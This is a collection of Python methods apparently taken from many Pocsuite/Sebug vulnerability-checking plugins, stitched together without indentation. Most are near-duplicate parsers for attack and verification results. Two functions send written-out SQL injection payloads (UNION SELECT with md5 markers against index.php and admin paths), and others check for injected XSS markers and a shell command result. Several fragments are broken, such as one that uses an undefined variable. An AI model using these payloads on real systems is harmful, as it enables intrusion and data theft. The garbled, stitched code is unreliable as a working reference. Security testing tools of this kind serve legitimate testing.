def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Not vulnerable')
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
def parse_output( self, result ):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Error')
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('failed')
return output
def parse_attack(self, response):
output = Output(self)
result = {}
if response:
result['FileInfo'] = {}
result['FileInfo']['Filename'] = response
result['FileInfo']['Filecontent'] = 'test123' * 10
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def parse_verify(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def parse_output(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Failed')
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("someting error")
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Not vulnerable')
return output
def parse_result(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail("Internet Nothing returned")
return output
def parse_attack(self, result):
output = Output(self)
if result:
output.success(result)
else:
output.fail('Internet nothing returned')
return output
def parse_attack(self, result):
output = Output(self)
if result['result']['result'] == 'Exploit Success.':
output.success(result)
else:
reason = result['result']['result']
print("\033[0;31m%s\033[0m" % reason)
output.fail('Exploit failed')
return output
def parse_verify(self, res):
output = Output(self)
result = {}
if "HOSTS" in res.content and "DNS" in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = res.url
output.success(result)
else:
output.fail('No vulnerability found.')
return output
def parse_verify(self, res):
output = Output(self)
result = {}
if '>alert(/SebugTest/)' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = self.url
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def parse_verify(self, res, payload, type):
output = Output(self)
result = {}
if type == 'xss' and '>alert(/Dirorder/)<' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urljoin(self.url, payload)
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def parse_verify(self, res, payload, type):
output = Output(self)
result = {}
if type == 'xss' and '>alert(/Sebug23333Test/)' in res.content:
#返回页面包含构造的特殊字段,说明xss存在
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urljoin(self.url, payload)
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def parse_attack(self, response):
output = Output(self)
result = {}
if response:
result['FileInfo'] = {}
result['FileInfo']['Filename'] = response
result['FileInfo']['Filecontent'] = 'test123' * 10
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def parse_verify(self, res):
output = Output(self)
result = {}
if res.status_code == 200 and "PHP Version" in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = res.url
output.success(result)
else:
output.fail('No vulnerability found.')
return output
def parse_attack(self, content):
output = Output(self)
result = {}
if content:
result['result'] = {}
result['result']['command'] = 'id'
result['result']['result'] = content
output.success(result)
else:
output.fail('Getshell failed')
return output
def parse_attack(self, response):
output = Output(self)
result = {}
if response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '%s' % self.url
output.success(result)
else:
output.fail('Fail test')
return output
def parse_verify(self, flag):
output = Output(self)
result = {}
if flag:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = res.url
output.success(result)
else:
output.fail('No vulnerability found.')
return output
def parse_verify(self, res, payload):
output = Output(self)
result = {}
if '4beed3b9c4a886067de0e3a094246f78' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = urljoin(self.url, payload)
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def _verify(self):
output = Output(self)
result = {}
payload = "/index.php?page=view&id=-511 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
verify_url = self.url + payload
content = req.get(verify_url).content
if 'fae0b27c451c728867a567e8c1bb4e53' in content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
output.success(result)
else:
output.fail('SQL Injection Failed')
return output
def parse_verify(self, res):
output = Output(self)
result = {}
if res.status_code == 200 and '<h1>SEBUG@NET</h1>' in res.content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = res.url
output.success(result)
else:
output.fail('Internet Nothing returned')
return output
def _verify(self):
output = Output(self)
result = {}
#根据Pocsuite格式要求,定义一个特殊输出字符串,验证sql注入是否成功
payload = "/admin/index.php?id=-1 UNION SELECT 1,CONCAT(0x7165696a71,CAST(md5(23333) AS CHAR),0x20),3,4,5,6,7 FROM dc_user"
verify_url = self.url + payload
content = req.get(verify_url).content
if "qeijq0ba7bc92fcd57e337ebb9e74308c811f" in content:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = verify_url
output.success(result)
else:
output.fail('SQL Injection Failed')
return output
def parse_output(self, response):
output = Output(self)
result = {}
if response:
m = re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.content)
if m:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = response.url
output.success(result)
else:
output.fail('Internet Nothing Returned')
return output